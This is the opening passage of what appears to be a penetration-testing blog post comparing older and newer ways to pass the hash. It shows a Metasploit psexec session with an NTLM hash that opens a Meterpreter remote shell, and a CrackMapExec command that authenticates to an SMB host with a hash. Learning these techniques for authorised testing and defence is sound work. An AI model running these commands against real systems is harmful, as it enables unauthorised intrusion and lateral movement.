Do you remember the first time you passed the hash? It probably went a little something like this:
|
1 2 3 4 5 6 |
msf > use exploit/windows/smb/psexec msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.57.133:443 -> 192.168.57.131:1045) |
If you are unfamiliar, that is the Metasploit PSexec module being used. Well, nowadays we don’t really do that anymore. You probably pass the hash something like this:
|
1 2 3 |
cme smb 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79 -d domain.local SMB 10.0.0.20 445 PC01 [*] Windows Server 2012 R2 Standard 9600 x64 (name:PC01) (domain:domain.local) (signing:False) (SMBv1:True) SMB 10.0.0.20 445 PC01 [+] domain.local\user BD1C6503987F8FF006296118F359FA79 (Pwn3d!) |
That is CrackMapExec being used to pass…
